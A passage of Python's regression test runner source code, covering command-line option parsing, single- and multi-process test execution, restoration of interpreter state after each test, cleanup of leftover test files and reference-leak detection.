'module')
group.add_argument('-D', '--coverdir', metavar='DIR',
type=relative_filename,
help='directory where coverage files are put')
group.add_argument('-N', '--nocoverdir',
action='store_const', const=None, dest='coverdir',
help='put coverage files alongside modules')
group.add_argument('-t', '--threshold', metavar='THRESHOLD',
type=int,
help='call gc.set_threshold(THRESHOLD)')
group.add_argument('-n', '--nowindows', action='store_true',
help='suppress error message boxes on Windows')
group.add_argument('-F', '--forever', action='store_true',
help='run the specified tests in a loop, until an '
'error happens')
parser.add_argument('args', nargs=argparse.REMAINDER,
help=argparse.SUPPRESS)
return parser
def relative_filename(string):
# CWD is replaced with a temporary dir before calling main(), so we
# join it with the saved CWD so it ends up where the user expects.
return os.path.join(support.SAVEDCWD, string)
def huntrleaks(string):
args = string.split(':')
if len(args) not in (2, 3):
raise argparse.ArgumentTypeError(
'needs 2 or 3 colon-separated arguments')
nwarmup = int(args[0]) if args[0] else 5
ntracked = int(args[1]) if args[1] else 4
fname = args[2] if len(args) > 2 and args[2] else 'reflog.txt'
return nwarmup, ntracked, fname
def resources_list(string):
u = [x.lower() for x in string.split(',')]
for r in u:
if r == 'all' or r == 'none':
continue
if r[0] == '-':
r = r[1:]
if r not in RESOURCE_NAMES:
raise argparse.ArgumentTypeError('invalid resource: ' + r)
return u
def _parse_args(args, **kwargs):
# Defaults
ns = argparse.Namespace(testdir=None, verbose=0, quiet=False,
exclude=False, single=False, randomize=False, fromfile=None,
findleaks=False, use_resources=None, trace=False, coverdir='coverage',
runleaks=False, huntrleaks=False, verbose2=False, print_slow=False,
random_seed=None, use_mp=None, verbose3=False, forever=False,
header=False, failfast=False, match_tests=None)
for k, v in kwargs.items():
if not hasattr(ns, k):
raise TypeError('%r is an invalid keyword argument '
'for this function' % k)
setattr(ns, k, v)
if ns.use_resources is None:
ns.use_resources = []
parser = _create_parser()
parser.parse_args(args=args, namespace=ns)
if ns.single and ns.fromfile:
parser.error("-s and -f don't go together!")
if ns.use_mp and ns.trace:
parser.error("-T and -j don't go together!")
if ns.use_mp and ns.findleaks:
parser.error("-l and -j don't go together!")
if ns.use_mp and ns.memlimit:
parser.error("-M and -j don't go together!")
if ns.failfast and not (ns.verbose or ns.verbose3):
parser.error("-G/--failfast needs either -v or -W")
if ns.quiet:
ns.verbose = 0
if ns.timeout is not None:
if hasattr(faulthandler, 'dump_traceback_later'):
if ns.timeout <= 0:
ns.timeout = None
else:
print("Warning: The timeout option requires "
"faulthandler.dump_traceback_later")
ns.timeout = None
if ns.use_mp is not None:
if ns.use_mp <= 0:
# Use all cores + extras for tests that like to sleep
ns.use_mp = 2 + (os.cpu_count() or 1)
if ns.use_mp == 1:
ns.use_mp = None
if ns.use:
for a in ns.use:
for r in a:
if r == 'all':
ns.use_resources[:] = RESOURCE_NAMES
continue
if r == 'none':
del ns.use_resources[:]
continue
remove = False
if r[0] == '-':
remove = True
r = r[1:]
if remove:
if r in ns.use_resources:
ns.use_resources.remove(r)
elif r not in ns.use_resources:
ns.use_resources.append(r)
if ns.random_seed is not None:
ns.randomize = True
return ns
def run_test_in_subprocess(testname, ns):
"""Run the given test in a subprocess with --slaveargs.
ns is the option Namespace parsed from command-line arguments. regrtest
is invoked in a subprocess with the --slaveargs argument; when the
subprocess exits, its return code, stdout and stderr are returned as a
3-tuple.
"""
from subprocess import Popen, PIPE
base_cmd = ([sys.executable] + support.args_from_interpreter_flags() +
['-X', 'faulthandler', '-m', 'test.regrtest'])
slaveargs = (
(testname, ns.verbose, ns.quiet),
dict(huntrleaks=ns.huntrleaks,
use_resources=ns.use_resources,
output_on_failure=ns.verbose3,
timeout=ns.timeout, failfast=ns.failfast,
match_tests=ns.match_tests))
# Running the child from the same working directory as regrtest's original
# invocation ensures that TEMPDIR for the child is the same when
# sysconfig.is_python_build() is true. See issue 15300.
popen = Popen(base_cmd + ['--slaveargs', json.dumps(slaveargs)],
stdout=PIPE, stderr=PIPE,
universal_newlines=True,
close_fds=(os.name != 'nt'),
cwd=support.SAVEDCWD)
stdout, stderr = popen.communicate()
retcode = popen.wait()
return retcode, stdout, stderr
def main(tests=None, **kwargs):
"""Execute a test suite.
This also parses command-line options and modifies its behavior
accordingly.
tests -- a list of strings containing test names (optional)
testdir -- the directory in which to look for tests (optional)
Users other than the Python test suite will certainly want to
specify testdir; if it's omitted, the directory containing the
Python test suite is searched for.
If the tests argument is omitted, the tests listed on the
command-line will be used. If that's empty, too, then all *.py
files beginning with test_ will be used.
The other default arguments (verbose, quiet, exclude,
single, randomize, findleaks, use_resources, trace, coverdir,
print_slow, and random_seed) allow programmers calling main()
directly to set the values that would normally be set by flags
on the command line.
"""
# Display the Python traceback on fatal errors (e.g. segfault)
faulthandler.enable(all_threads=True)
# Display the Python traceback on SIGALRM or SIGUSR1 signal
signals = []
if hasattr(signal, 'SIGALRM'):
signals.append(signal.SIGALRM)
if hasattr(signal, 'SIGUSR1'):
signals.append(signal.SIGUSR1)
for signum in signals:
faulthandler.register(signum, chain=True)
replace_stdout()
support.record_original_stdout(sys.stdout)
ns = _parse_args(sys.argv[1:], **kwargs)
if ns.huntrleaks:
# Avoid false positives due to various caches
# filling slowly with random data:
warm_caches()
if ns.memlimit is not None:
support.set_memlimit(ns.memlimit)
if ns.threshold is not None:
import gc
gc.set_threshold(ns.threshold)
if ns.nowindows:
import msvcrt
msvcrt.SetErrorMode(msvcrt.SEM_FAILCRITICALERRORS|
msvcrt.SEM_NOALIGNMENTFAULTEXCEPT|
msvcrt.SEM_NOGPFAULTERRORBOX|
msvcrt.SEM_NOOPENFILEERRORBOX)
try:
msvcrt.CrtSetReportMode
except AttributeError:
# release build
pass
else:
for m in [msvcrt.CRT_WARN, msvcrt.CRT_ERROR, msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(m, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(m, msvcrt.CRTDBG_FILE_STDERR)
if ns.wait:
input("Press any key to continue...")
if ns.slaveargs is not None:
args, kwargs = json.loads(ns.slaveargs)
if kwargs.get('huntrleaks'):
unittest.BaseTestSuite._cleanup = False
try:
result = runtest(*args, **kwargs)
except KeyboardInterrupt:
result = INTERRUPTED, ''
except BaseException as e:
traceback.print_exc()
result = CHILD_ERROR, str(e)
sys.stdout.flush()
print() # Force a newline (just in case)
print(json.dumps(result))
sys.exit(0)
good = []
bad = []
skipped = []
resource_denieds = []
environment_changed = []
interrupted = False
if ns.findleaks:
try:
import gc
except ImportError:
print('No GC available, disabling findleaks.')
ns.findleaks = False
else:
# Uncomment the line below to report garbage that is not
# freeable by reference counting alone. By default only
# garbage that is not collectable by the GC is reported.
#gc.set_debug(gc.DEBUG_SAVEALL)
found_garbage = []
if ns.huntrleaks:
unittest.BaseTestSuite._cleanup = False
if ns.single:
filename = os.path.join(TEMPDIR, 'pynexttest')
try:
with open(filename, 'r') as fp:
next_test = fp.read().strip()
tests = [next_test]
except OSError:
pass
if ns.fromfile:
tests = []
with open(os.path.join(support.SAVEDCWD, ns.fromfile)) as fp:
count_pat = re.compile(r'\[\s*\d+/\s*\d+\]')
for line in fp:
line = count_pat.sub('', line)
guts = line.split() # assuming no test has whitespace in its name
if guts and not guts[0].startswith('#'):
tests.extend(guts)
# Strip .py extensions.
removepy(ns.args)
removepy(tests)
stdtests = STDTESTS[:]
nottests = NOTTESTS.copy()
if ns.exclude:
for arg in ns.args:
if arg in stdtests:
stdtests.remove(arg)
nottests.add(arg)
ns.args = []
# For a partial run, we do not need to clutter the output.
if ns.verbose or ns.header or not (ns.quiet or ns.single or tests or ns.args):
# Print basic platform information
print("==", platform.python_implementation(), *sys.version.split())
#print("== ", platform.platform(aliased=True),
# "%s-endian" % sys.byteorder)
print("== ", "hash algorithm:", sys.hash_info.algorithm,
"64bit" if sys.maxsize > 2**32 else "32bit")
print("== ", os.getcwd())
print("Testing with flags:", sys.flags)
# if testdir is set, then we are not running the python tests suite, so
# don't add default tests to be executed or skipped (pass empty values)
if ns.testdir:
alltests = findtests(ns.testdir, list(), set())
else:
alltests = findtests(ns.testdir, stdtests, nottests)
selected = tests or ns.args or alltests
if ns.single:
selected = selected[:1]
try:
next_single_test = alltests[alltests.index(selected[0])+1]
except IndexError:
next_single_test = None
# Remove all the selected tests that precede start if it's set.
if ns.start:
try:
del selected[:selected.index(ns.start)]
except ValueError:
print("Couldn't find starting test (%s), using all tests" % ns.start)
if ns.randomize:
if ns.random_seed is None:
ns.random_seed = random.randrange(10000000)
random.seed(ns.random_seed)
print("Using random seed", ns.random_seed)
random.shuffle(selected)
if ns.trace:
import trace, tempfile
tracer = trace.Trace(ignoredirs=[sys.base_prefix, sys.base_exec_prefix,
tempfile.gettempdir()],
trace=False, count=True)
test_times = []
support.verbose = ns.verbose # Tell tests to be moderately quiet
support.use_resources = ns.use_resources
save_modules = sys.modules.keys()
def accumulate_result(test, result):
ok, test_time = result
test_times.append((test_time, test))
if ok == PASSED:
good.append(test)
elif ok == FAILED:
bad.append(test)
elif ok == ENV_CHANGED:
environment_changed.append(test)
elif ok == SKIPPED:
skipped.append(test)
elif ok == RESOURCE_DENIED:
skipped.append(test)
resource_denieds.append(test)
if ns.forever:
def test_forever(tests=list(selected)):
while True:
for test in tests:
yield test
if bad:
return
tests = test_forever()
test_count = ''
test_count_width = 3
else:
tests = iter(selected)
test_count = '/{}'.format(len(selected))
test_count_width = len(test_count) - 1
if ns.use_mp:
try:
from threading import Thread
except ImportError:
print("Multiprocess option requires thread support")
sys.exit(2)
from queue import Queue
debug_output_pat = re.compile(r"\[\d+ refs, \d+ blocks\]$")
output = Queue()
pending = MultiprocessTests(tests)
def work():
# A worker thread.
try:
while True:
try:
test = next(pending)
except StopIteration:
output.put((None, None, None, None))
return
retcode, stdout, stderr = run_test_in_subprocess(test, ns)
# Strip last refcount output line if it exists, since it
# comes from the shutdown of the interpreter in the subcommand.
stderr = debug_output_pat.sub("", stderr)
stdout, _, result = stdout.strip().rpartition("\n")
if retcode != 0:
result = (CHILD_ERROR, "Exit code %s" % retcode)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
return
if not result:
output.put((None, None, None, None))
return
result = json.loads(result)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
except BaseException:
output.put((None, None, None, None))
raise
workers = [Thread(target=work) for i in range(ns.use_mp)]
for worker in workers:
worker.start()
finished = 0
test_index = 1
try:
while finished < ns.use_mp:
test, stdout, stderr, result = output.get()
if test is None:
finished += 1
continue
accumulate_result(test, result)
if not ns.quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count,
len(bad), test))
if stdout:
print(stdout)
if stderr:
print(stderr, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
if result[0] == INTERRUPTED:
raise KeyboardInterrupt
if result[0] == CHILD_ERROR:
raise Exception("Child error on {}: {}".format(test, result[1]))
test_index += 1
except KeyboardInterrupt:
interrupted = True
pending.interrupted = True
for worker in workers:
worker.join()
else:
for test_index, test in enumerate(tests, 1):
if not ns.quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count, len(bad), test))
sys.stdout.flush()
if ns.trace:
# If we're tracing code coverage, then we don't exit with status
# if on a false return value from main.
tracer.runctx('runtest(test, ns.verbose, ns.quiet, timeout=ns.timeout)',
globals=globals(), locals=vars())
else:
try:
result = runtest(test, ns.verbose, ns.quiet,
ns.huntrleaks,
output_on_failure=ns.verbose3,
timeout=ns.timeout, failfast=ns.failfast,
match_tests=ns.match_tests)
accumulate_result(test, result)
except KeyboardInterrupt:
interrupted = True
break
if ns.findleaks:
gc.collect()
if gc.garbage:
print("Warning: test created", len(gc.garbage), end=' ')
print("uncollectable object(s).")
# move the uncollectable objects somewhere so we don't see
# them again
found_garbage.extend(gc.garbage)
del gc.garbage[:]
# Unload the newly imported modules (best effort finalization)
for module in sys.modules.keys():
if module not in save_modules and module.startswith("test."):
support.unload(module)
if interrupted:
# print a newline after ^C
print()
print("Test suite interrupted by signal SIGINT.")
omitted = set(selected) - set(good) - set(bad) - set(skipped)
print(count(len(omitted), "test"), "omitted:")
printlist(omitted)
if good and not ns.quiet:
if not bad and not skipped and not interrupted and len(good) > 1:
print("All", end=' ')
print(count(len(good), "test"), "OK.")
if ns.print_slow:
test_times.sort(reverse=True)
print("10 slowest tests:")
for time, test in test_times[:10]:
print("%s: %.1fs" % (test, time))
if bad:
bad = sorted(set(bad) - set(environment_changed))
if bad:
print(count(len(bad), "test"), "failed:")
printlist(bad)
if environment_changed:
print("{} altered the execution environment:".format(
count(len(environment_changed), "test")))
printlist(environment_changed)
if skipped and not ns.quiet:
print(count(len(skipped), "test"), "skipped:")
printlist(skipped)
if ns.verbose2 and bad:
print("Re-running failed tests in verbose mode")
for test in bad:
print("Re-running test %r in verbose mode" % test)
sys.stdout.flush()
try:
ns.verbose = True
ok = runtest(test, True, ns.quiet, ns.huntrleaks,
timeout=ns.timeout)
except KeyboardInterrupt:
# print a newline separate from the ^C
print()
break
if ns.single:
if next_single_test:
with open(filename, 'w') as fp:
fp.write(next_single_test + '\n')
else:
os.unlink(filename)
if ns.trace:
r = tracer.results()
r.write_results(show_missing=True, summary=True, coverdir=ns.coverdir)
if ns.runleaks:
os.system("leaks %d" % os.getpid())
sys.exit(len(bad) > 0 or interrupted)
# small set of tests to determine if we have a basically functioning interpreter
# (i.e. if any of these fail, then anything else is likely to follow)
STDTESTS = [
'test_grammar',
'test_opcodes',
'test_dict',
'test_builtin',
'test_exceptions',
'test_types',
'test_unittest',
'test_doctest',
'test_doctest2',
'test_support'
]
# set of tests that we don't want to be executed when using regrtest
NOTTESTS = set()
def findtests(testdir=None, stdtests=STDTESTS, nottests=NOTTESTS):
"""Return a list of all applicable test modules."""
testdir = findtestdir(testdir)
names = os.listdir(testdir)
tests = []
others = set(stdtests) | nottests
for name in names:
mod, ext = os.path.splitext(name)
if mod[:5] == "test_" and ext in (".py", "") and mod not in others:
tests.append(mod)
return stdtests + sorted(tests)
# We do not use a generator so multiple threads can call next().
class MultiprocessTests(object):
"""A thread-safe iterator over tests for multiprocess mode."""
def __init__(self, tests):
self.interrupted = False
self.lock = threading.Lock()
self.tests = tests
def __iter__(self):
return self
def __next__(self):
with self.lock:
if self.interrupted:
raise StopIteration('tests interrupted')
return next(self.tests)
def replace_stdout():
"""Set stdout encoder error handler to backslashreplace (as stderr error
handler) to avoid UnicodeEncodeError when printing a traceback"""
import atexit
stdout = sys.stdout
sys.stdout = open(stdout.fileno(), 'w',
encoding=stdout.encoding,
errors="backslashreplace",
closefd=False,
newline='\n')
def restore_stdout():
sys.stdout.close()
sys.stdout = stdout
atexit.register(restore_stdout)
if sys.platform == "uwp":
""" For UWP, do not replace the stdout as there isn't a stdout """
def replace_stdout():
pass
def runtest(test, verbose, quiet,
huntrleaks=False, use_resources=None,
output_on_failure=False, failfast=False, match_tests=None,
timeout=None):
"""Run a single test.
test -- the name of the test
verbose -- if true, print more messages
quiet -- if true, don't print 'skipped' messages (probably redundant)
huntrleaks -- run multiple times to test for leaks; requires a debug
build; a triple corresponding to -R's three arguments
use_resources -- list of extra resources to use
output_on_failure -- if true, display test output on failure
timeout -- dump the traceback and exit if a test takes more than
timeout seconds
failfast, match_tests -- See regrtest command-line flags for these.
Returns the tuple result, test_time, where result is one of the constants:
INTERRUPTED KeyboardInterrupt when run under -j
RESOURCE_DENIED test skipped because resource denied
SKIPPED test skipped for some other reason
ENV_CHANGED test failed because it changed the execution environment
FAILED test failed
PASSED test passed
"""
if use_resources is not None:
support.use_resources = use_resources
use_timeout = (timeout is not None)
if use_timeout:
faulthandler.dump_traceback_later(timeout, exit=True)
try:
support.match_tests = match_tests
if failfast:
support.failfast = True
if output_on_failure:
support.verbose = True
# Reuse the same instance to all calls to runtest(). Some
# tests keep a reference to sys.stdout or sys.stderr
# (eg. test_argparse).
if runtest.stringio is None:
stream = io.StringIO()
runtest.stringio = stream
else:
stream = runtest.stringio
stream.seek(0)
stream.truncate()
orig_stdout = sys.stdout
orig_stderr = sys.stderr
try:
sys.stdout = stream
sys.stderr = stream
result = runtest_inner(test, verbose, quiet, huntrleaks,
display_failure=False)
if result[0] == FAILED:
output = stream.getvalue()
orig_stderr.write(output)
orig_stderr.flush()
finally:
sys.stdout = orig_stdout
sys.stderr = orig_stderr
else:
support.verbose = verbose # Tell tests to be moderately quiet
result = runtest_inner(test, verbose, quiet, huntrleaks,
display_failure=not verbose)
return result
finally:
if use_timeout:
faulthandler.cancel_dump_traceback_later()
cleanup_test_droppings(test, verbose)
runtest.stringio = None
# Unit tests are supposed to leave the execution environment unchanged
# once they complete. But sometimes tests have bugs, especially when
# tests fail, and the changes to environment go on to mess up other
# tests. This can cause issues with buildbot stability, since tests
# are run in random order and so problems may appear to come and go.
# There are a few things we can save and restore to mitigate this, and
# the following context manager handles this task.
class saved_test_environment:
"""Save bits of the test environment and restore them at block exit.
with saved_test_environment(testname, verbose, quiet):
#stuff
Unless quiet is True, a warning is printed to stderr if any of
the saved items was changed by the test. The attribute 'changed'
is initially False, but is set to True if a change is detected.
If verbose is more than 1, the before and after state of changed
items is also printed.
"""
changed = False
def __init__(self, testname, verbose=0, quiet=False):
self.testname = testname
self.verbose = verbose
self.quiet = quiet
# To add things to save and restore, add a name XXX to the resources list
# and add corresponding get_XXX/restore_XXX functions. get_XXX should
# return the value to be saved and compared against a second call to the
# get function when test execution completes. restore_XXX should accept
# the saved value and restore the resource using it. It will be called if
# and only if a change in the value is detected.
#
# Note: XXX will have any '.' replaced with '_' characters when determining
# the corresponding method names.
resources = ('sys.argv', 'cwd', 'sys.stdin', 'sys.stdout', 'sys.stderr',
'os.environ', 'sys.path', 'sys.path_hooks', '__import__',
'warnings.filters', 'asyncore.socket_map',
'logging._handlers', 'logging._handlerList', 'sys.gettrace',
'sys.warnoptions',
# multiprocessing.process._cleanup() may release ref
# to a thread, so check processes first.
'multiprocessing.process._dangling', 'threading._dangling',
'sysconfig._CONFIG_VARS', 'sysconfig._INSTALL_SCHEMES',
'files', 'locale', 'warnings.showwarning',
)
def get_sys_argv(self):
return id(sys.argv), sys.argv, sys.argv[:]
def restore_sys_argv(self, saved_argv):
sys.argv = saved_argv[1]
sys.argv[:] = saved_argv[2]
def get_cwd(self):
return os.getcwd()
def restore_cwd(self, saved_cwd):
os.chdir(saved_cwd)
def get_sys_stdout(self):
return sys.stdout
def restore_sys_stdout(self, saved_stdout):
sys.stdout = saved_stdout
def get_sys_stderr(self):
return sys.stderr
def restore_sys_stderr(self, saved_stderr):
sys.stderr = saved_stderr
def get_sys_stdin(self):
return sys.stdin
def restore_sys_stdin(self, saved_stdin):
sys.stdin = saved_stdin
def get_os_environ(self):
return id(os.environ), os.environ, dict(os.environ)
def restore_os_environ(self, saved_environ):
os.environ = saved_environ[1]
os.environ.clear()
os.environ.update(saved_environ[2])
def get_sys_path(self):
return id(sys.path), sys.path, sys.path[:]
def restore_sys_path(self, saved_path):
sys.path = saved_path[1]
sys.path[:] = saved_path[2]
def get_sys_path_hooks(self):
return id(sys.path_hooks), sys.path_hooks, sys.path_hooks[:]
def restore_sys_path_hooks(self, saved_hooks):
sys.path_hooks = saved_hooks[1]
sys.path_hooks[:] = saved_hooks[2]
def get_sys_gettrace(self):
return sys.gettrace()
def restore_sys_gettrace(self, trace_fxn):
sys.settrace(trace_fxn)
def get___import__(self):
return builtins.__import__
def restore___import__(self, import_):
builtins.__import__ = import_
def get_warnings_filters(self):
return id(warnings.filters), warnings.filters, warnings.filters[:]
def restore_warnings_filters(self, saved_filters):
warnings.filters = saved_filters[1]
warnings.filters[:] = saved_filters[2]
def get_asyncore_socket_map(self):
asyncore = sys.modules.get('asyncore')
# XXX Making a copy keeps objects alive until __exit__ gets called.
return asyncore and asyncore.socket_map.copy() or {}
def restore_asyncore_socket_map(self, saved_map):
asyncore = sys.modules.get('asyncore')
if asyncore is not None:
asyncore.close_all(ignore_all=True)
asyncore.socket_map.update(saved_map)
def get_shutil_archive_formats(self):
# we could call get_archives_formats() but that only returns the
# registry keys; we want to check the values too (the functions that
# are registered)
return shutil._ARCHIVE_FORMATS, shutil._ARCHIVE_FORMATS.copy()
def restore_shutil_archive_formats(self, saved):
shutil._ARCHIVE_FORMATS = saved[0]
shutil._ARCHIVE_FORMATS.clear()
shutil._ARCHIVE_FORMATS.update(saved[1])
def get_shutil_unpack_formats(self):
return shutil._UNPACK_FORMATS, shutil._UNPACK_FORMATS.copy()
def restore_shutil_unpack_formats(self, saved):
shutil._UNPACK_FORMATS = saved[0]
shutil._UNPACK_FORMATS.clear()
shutil._UNPACK_FORMATS.update(saved[1])
def get_logging__handlers(self):
# _handlers is a WeakValueDictionary
return id(logging._handlers), logging._handlers, logging._handlers.copy()
def restore_logging__handlers(self, saved_handlers):
# Can't easily revert the logging state
pass
def get_logging__handlerList(self):
# _handlerList is a list of weakrefs to handlers
return id(logging._handlerList), logging._handlerList, logging._handlerList[:]
def restore_logging__handlerList(self, saved_handlerList):
# Can't easily revert the logging state
pass
def get_sys_warnoptions(self):
return id(sys.warnoptions), sys.warnoptions, sys.warnoptions[:]
def restore_sys_warnoptions(self, saved_options):
sys.warnoptions = saved_options[1]
sys.warnoptions[:] = saved_options[2]
# Controlling dangling references to Thread objects can make it easier
# to track reference leaks.
def get_threading__dangling(self):
if not threading:
return None
# This copies the weakrefs without making any strong reference
return threading._dangling.copy()
def restore_threading__dangling(self, saved):
if not threading:
return
threading._dangling.clear()
threading._dangling.update(saved)
# Same for Process objects
def get_multiprocessing_process__dangling(self):
if not multiprocessing:
return None
# Unjoined process objects can survive after process exits
multiprocessing.process._cleanup()
# This copies the weakrefs without making any strong reference
return multiprocessing.process._dangling.copy()
def restore_multiprocessing_process__dangling(self, saved):
if not multiprocessing:
return
multiprocessing.process._dangling.clear()
multiprocessing.process._dangling.update(saved)
def get_sysconfig__CONFIG_VARS(self):
# make sure the dict is initialized
sysconfig.get_config_var('prefix')
return (id(sysconfig._CONFIG_VARS), sysconfig._CONFIG_VARS,
dict(sysconfig._CONFIG_VARS))
def restore_sysconfig__CONFIG_VARS(self, saved):
sysconfig._CONFIG_VARS = saved[1]
sysconfig._CONFIG_VARS.clear()
sysconfig._CONFIG_VARS.update(saved[2])
def get_sysconfig__INSTALL_SCHEMES(self):
return (id(sysconfig._INSTALL_SCHEMES), sysconfig._INSTALL_SCHEMES,
sysconfig._INSTALL_SCHEMES.copy())
def restore_sysconfig__INSTALL_SCHEMES(self, saved):
sysconfig._INSTALL_SCHEMES = saved[1]
sysconfig._INSTALL_SCHEMES.clear()
sysconfig._INSTALL_SCHEMES.update(saved[2])
def get_files(self):
return sorted(fn + ('/' if os.path.isdir(fn) else '')
for fn in os.listdir())
def restore_files(self, saved_value):
fn = support.TESTFN
if fn not in saved_value and (fn + '/') not in saved_value:
if os.path.isfile(fn):
support.unlink(fn)
elif os.path.isdir(fn):
support.rmtree(fn)
_lc = [getattr(locale, lc) for lc in dir(locale)
if lc.startswith('LC_')]
def get_locale(self):
pairings = []
for lc in self._lc:
try:
pairings.append((lc, locale.setlocale(lc, None)))
except (TypeError, ValueError):
continue
return pairings
def restore_locale(self, saved):
for lc, setting in saved:
locale.setlocale(lc, setting)
def get_warnings_showwarning(self):
return warnings.showwarning
def restore_warnings_showwarning(self, fxn):
warnings.showwarning = fxn
def resource_info(self):
for name in self.resources:
method_suffix = name.replace('.', '_')
get_name = 'get_' + method_suffix
restore_name = 'restore_' + method_suffix
yield name, getattr(self, get_name), getattr(self, restore_name)
def __enter__(self):
self.saved_values = dict((name, get()) for name, get, restore
in self.resource_info())
return self
def __exit__(self, exc_type, exc_val, exc_tb):
saved_values = self.saved_values
del self.saved_values
for name, get, restore in self.resource_info():
current = get()
original = saved_values.pop(name)
# Check for changes to the resource's value
if current != original:
self.changed = True
restore(original)
if not self.quiet:
print("Warning -- {} was modified by {}".format(
name, self.testname),
file=sys.stderr)
if self.verbose > 1:
print(" Before: {}\n After: {} ".format(
original, current),
file=sys.stderr)
return False
def runtest_inner(test, verbose, quiet,
huntrleaks=False, display_failure=True):
support.unload(test)
test_time = 0.0
refleak = False # True if the test leaked references.
try:
if test.startswith('test.'):
abstest = test
else:
# Always import it from the test package
abstest = 'test.' + test
with saved_test_environment(test, verbose, quiet) as environment:
start_time = time.time()
the_module = importlib.import_module(abstest)
# If the test has a test_main, that will run the appropriate
# tests. If not, use normal unittest test loading.
test_runner = getattr(the_module, "test_main", None)
if test_runner is None:
def test_runner():
loader = unittest.TestLoader()
tests = loader.loadTestsFromModule(the_module)
for error in loader.errors:
print(error, file=sys.stderr)
if loader.errors:
raise Exception("errors while loading tests")
support.run_unittest(tests)
test_runner()
if huntrleaks:
refleak = dash_R(the_module, test, test_runner, huntrleaks)
test_time = time.time() - start_time
except support.ResourceDenied as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return RESOURCE_DENIED, test_time
except unittest.SkipTest as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return SKIPPED, test_time
except KeyboardInterrupt:
raise
except support.TestFailed as msg:
if display_failure:
print("test", test, "failed --", msg, file=sys.stderr)
else:
print("test", test, "failed", file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
except:
msg = traceback.format_exc()
print("test", test, "crashed --", msg, file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
else:
if refleak:
return FAILED, test_time
if environment.changed:
return ENV_CHANGED, test_time
return PASSED, test_time
def cleanup_test_droppings(testname, verbose):
import shutil
import stat
import gc
# First kill any dangling references to open files etc.
# This can also issue some ResourceWarnings which would otherwise get
# triggered during the following test run, and possibly produce failures.
gc.collect()
# Try to clean up junk commonly left behind. While tests shouldn't leave
# any files or directories behind, when a test fails that can be tedious
# for it to arrange. The consequences can be especially nasty on Windows,
# since if a test leaves a file open, it cannot be deleted by name (while
# there's nothing we can do about that here either, we can display the
# name of the offending test, which is a real help).
for name in (support.TESTFN,
"db_home",
):
if not os.path.exists(name):
continue
if os.path.isdir(name):
kind, nuker = "directory", shutil.rmtree
elif os.path.isfile(name):
kind, nuker = "file", os.unlink
else:
raise SystemError("os.path says %r exists but is neither "
"directory nor file" % name)
if verbose:
print("%r left behind %s %r" % (testname, kind, name))
try:
# if we have chmod, fix possible permissions problems
# that might prevent cleanup
if (hasattr(os, 'chmod')):
os.chmod(name, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
nuker(name)
except Exception as msg:
print(("%r left behind %s %r and it couldn't be "
"removed: %s" % (testname, kind, name, msg)), file=sys.stderr)
def dash_R(the_module, test, indirect_test, huntrleaks):
"""Run a test multiple times, looking for reference leaks.
Returns:
False if the test didn't leak references; True if we detected refleaks.
"""
# This code is hackish and inelegant, but it seems to do the job.
import copyreg
import collections.abc
if not hasattr(sys, 'gettotalrefcount'):
raise Exception("Tracking reference leaks requires a debug build "
"of Python")
# Save current values for dash_R_cleanup() to restore.
fs = warnings.filters[:]
ps = copyreg.dispatch_table.copy()
pic = sys.path_importer_cache.copy()
try:
import zipimport
except ImportError:
zdc = None # Run unmodified on platforms without zipimport support
else:
zdc = zipimport._zip_directory_cache.copy()
abcs = {}
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
abcs[obj] = obj._abc_registry.copy()
nwarmup, ntracked, fname = huntrleaks
fname = os.path.join(support.SAVEDCWD, fname)
repcount = nwarmup + ntracked
rc_deltas = [0] * repcount
alloc_deltas = [0] * repcount
print("beginning", repcount, "repetitions", file=sys.stderr)
print(("1234567890"*(repcount//10 + 1))[:repcount], file=sys.stderr)
sys.stderr.flush()
for i in range(repcount):
indirect_test()
alloc_after, rc_after = dash_R_cleanup(fs, ps, pic, zdc, abcs)
sys.stderr.write('.')
sys.stderr.flush()
if i >= nwarmup:
rc_deltas[i] = rc_after - rc_before
alloc_deltas[i] = alloc_after - alloc_before
alloc_before, rc_before = alloc_after, rc_after
print(file=sys.stderr)
# These checkers return False on success, True on failure
def check_rc_deltas(deltas):
return any(deltas)
def check_alloc_deltas(deltas):
# At least 1/3rd of 0s
if 3 * deltas.count(0) < len(deltas):
return True
# Nothing else than 1s, 0s and -1s
if not set(deltas) <= {1,0,-1}:
return True
return False
failed = False
for deltas, item_name, checker in [
(rc_deltas, 'references', check_rc_deltas),
(alloc_deltas, 'memory blocks', check_alloc_deltas)]:
if checker(deltas):
msg = '%s leaked %s %s, sum=%s' % (
test, deltas[nwarmup:], item_name, sum(deltas))
print(msg, file=sys.stderr)
sys.stderr.flush()
with open(fname, "a") as refrep:
print(msg, file=refrep)
refrep.flush()
failed = True
return failed
def dash_R_cleanup(fs, ps, pic, zdc, abcs):
import gc, copyreg
import _strptime, linecache
import urllib.parse, urllib.request, mimetypes, doctest
import struct, filecmp, collections.abc
from distutils.dir_util import _path_created
from weakref import WeakSet
# Clear the warnings registry, so they can be displayed again
for mod in sys.modules.values():
if hasattr(mod, '__warningregistry__'):
del mod.__warningregistry__
# Restore some original values.
warnings.filters[:] = fs
copyreg.dispatch_table.clear()
copyreg.dispatch_table.update(ps)
sys.path_importer_cache.clear()
sys.path_importer_cache.update(pic)
try:
import zipimport
except ImportError:
pass # Run unmodified on platforms without zipimport support
else:
zipimport._zip_directory_cache.clear()
zipimport._zip_directory_cache.update(zdc)
# clear type cache
sys._clear_type_cache()
# Clear ABC registries, restoring previously saved ABC registries.
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
obj._abc_registry = abcs.get(obj, WeakSet()).copy()
